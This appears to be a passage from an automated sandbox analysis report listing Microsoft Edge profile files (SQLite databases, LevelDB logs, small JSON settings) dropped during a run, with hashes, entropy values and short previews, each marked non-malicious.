                                                                                                                                                                                                                                                                                                      Preview:SNSS........@Sr............@Sr......".@Sr............@Sr........@Sr........@Sr........@Sr....!...@Sr................................@Sr.@Sr1..,....@Sr$...972c3832_33b7_4265_90b1_f278fa5b6c01....@Sr........@Sr....r.$.........@Sr....@Sr........................@Sr....................5..0....@Sr&...{46F3A197-DB49-410A-81B3-94975C835573}......@Sr........@Sr...........................@Sr............@Sr........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.........aL.)....aL.).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                      MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                      SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                      SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                      SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):356
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1032058245175005
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHnyq2PN723oH+Tcwt7Uh2ghZIFUt8sOHx1Zmw+sOHteFlRkwON723oH+Tcwt7w:xayvVaYebIhHh2FUt8sax1/+sateF5On
                                                                                                                                                                                                                                                                                                      MD5:F261B5151A3BAB38CB31F32CB45782DC
                                                                                                                                                                                                                                                                                                      SHA1:4ED08A7851ECFFC0BD3DA42CA014F10A37F8BD52
                                                                                                                                                                                                                                                                                                      SHA-256:E4D756464C64EB94CACC38FCBC05796640B949DFEF08DBF36E32E0775A2483F4
                                                                                                                                                                                                                                                                                                      SHA-512:E89D4B0A680FCC9711EB28A1AEAD95F1FC32E6ABF62159A553E4706B81901E6A2A3665E83459771EEA42DF3CD9049ABCA32C442B729E20C89667C0921F0EA09A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.630 1510 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/23-11:14:56.630 1510 Recovering log #3.2024/12/23-11:14:56.631 1510 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):435
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.262764157865486
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:x8VvVaYebvqBQFUt8s0Hwg/+s/mI5OaYebvqBvJ:q5VaYebvZg8hHwJSOaYebvk
                                                                                                                                                                                                                                                                                                      MD5:679529FB26AD3F27C80F9C0938987ED2
                                                                                                                                                                                                                                                                                                      SHA1:3A71F04708B7B47DBCA679E4E09C37E9AD450F14
                                                                                                                                                                                                                                                                                                      SHA-256:A0CFDEB8218743947F88E5192AF42454AF87551EDFBFAF27602A8A71A5814563
                                                                                                                                                                                                                                                                                                      SHA-512:F6A2E1DD66FEA181C28C97A459A6245BBA608D4CF3A6FBE5050033E35FB7DAB62D7820CB26B309ECF5761F30B82521DA3B760B0AA9BACD70F6ED5C8B54B6BEAF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.639 408 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/23-11:14:57.641 408 Recovering log #3.2024/12/23-11:14:57.646 408 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):111
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                      MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                      SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                      SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                      SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                      MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                      SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                      SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                      SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):111
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                      MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                      SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                      SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                      SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                      MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                      SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                      SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                      SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):423
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.225527673651129
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:xwRAvVaYebvqBZFUt8sG/+s7T5OaYebvqBaJ:qAVaYebvyg8XFOaYebvL
                                                                                                                                                                                                                                                                                                      MD5:B40C05B4B03C505687DC188D368A3DB9
                                                                                                                                                                                                                                                                                                      SHA1:943047AF064E2A6B413B1ADD114D0032267436AD
                                                                                                                                                                                                                                                                                                      SHA-256:6B5E7D91AEB2A3CB042D0A96B49783959B975E44D49D288188751B2E7786E8DD
                                                                                                                                                                                                                                                                                                      SHA-512:D37F63B26F78CD6AD22D585DF42F3DD312247939F7576D39EED93F2615885F00DB5638590C2E48A0477CED76D1964CD2D4248CEA0C3BD7E886C7E30076E291A9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:15.354 640 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/23-11:15:15.356 640 Recovering log #3.2024/12/23-11:15:15.359 640 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):329
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.194273234210621
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHE3VF34q2PN723oH+TcwtpIFUt8sOHE3VF3JZmw+sOHE3VF3DkwON723oH+TcM:xaEf4vVaYebmFUt8saEfJ/+saEfD5OaT
                                                                                                                                                                                                                                                                                                      MD5:5CDAC9643FDD8884F69DDDDAC30148B6
                                                                                                                                                                                                                                                                                                      SHA1:EBC00189A32C641EE36458924D29A33B1C6EBE70
                                                                                                                                                                                                                                                                                                      SHA-256:C0BA467AA0910514147239FC673CDE357265D042C4C08CAC7BA7999696F2682D
                                                                                                                                                                                                                                                                                                      SHA-512:BDC6C2C4FF7DDC43DCB0BDDE21EE3E9C8B8DC186B2612DF4A71B02FCF3DE6B4AFB0356256E82A41BEA159E0C7A297B45B27677C55D448DBB513A2955D80DF87B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.566 9e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/23-11:14:56.566 9e0 Recovering log #3.2024/12/23-11:14:56.566 9e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.2680313905361795
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:384:L/2qOB1nxCkMzSA1LyKOMq+8iP5GDHP/0jMVumS:Kq+n0Jz91LyKOMq+8iP5GLP/0/
                                                                                                                                                                                                                                                                                                      MD5:1E7C2DB97171FF0366B78CC79317B690
                                                                                                                                                                                                                                                                                                      SHA1:1A034AAF870E7D3ACE3051AAFD8F6736B7AF3F29
                                                                                                                                                                                                                                                                                                      SHA-256:F7D2FACFD87176E929C54AFE4CE8DED5AB19E6738B5E0E8F2E74F121D99A8457
                                                                                                                                                                                                                                                                                                      SHA-512:00AA475FE9A196AD35FD83C090AD16B64B31728073CE149CCF45111446DDB18764F7997BD269C37CEC2F9CA7067094722C44594D2A547349398CA0F3D488E2CA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4666918805304971
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0f50:v7doKsKuKZKlZNmu46yjx0fy
                                                                                                                                                                                                                                                                                                      MD5:FE70902DDFA536B891CBB79B949D684F
                                                                                                                                                                                                                                                                                                      SHA1:8BC7F78E9BC4905E8FD8BD50BD1E33F1BE2B56D8
                                                                                                                                                                                                                                                                                                      SHA-256:E59C5D5FD1084F47487D991570C62F838581203C30CEAD604FC1FDDB05C19E23
                                                                                                                                                                                                                                                                                                      SHA-512:AD23BCF29EE5F0E89AF52866087D11CCEC98513C87A9B2E017B0F2721B5C8CF6805C079D61E5A3DC885D0011488C29E210944F3B871A3AFC0124941EE774BB20
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):12824
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.136755025221819
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:SMFtv9Nllv/etXlfsDNlho34//l/h4jRfn1d7jdtQfZlnctyJBd/lseXtXlfsBdn:SEtvMl0Blh04puj3dndclncsBllll0Bd
                                                                                                                                                                                                                                                                                                      MD5:F3EF865A2200EC93219DA99624DC2F7D
                                                                                                                                                                                                                                                                                                      SHA1:136DD3F07EE3A6679CBF3AC8F5B14C853781F0C7
                                                                                                                                                                                                                                                                                                      SHA-256:1013A03ABA7251660A43D1FB44FAFAC1318A03E7FC5A5F53D453DA99B84BE5DF
                                                                                                                                                                                                                                                                                                      SHA-512:DAF058F3A730A6BF2709D71130AF033C7393C672CCCA8BE8A5ADA9750CE214D72C96AFA3F6887447452325A2DC0890D50DD8DD655268F34D2B2393BA4B03A99E
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):11755
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                      MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                      SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                      SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                      SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
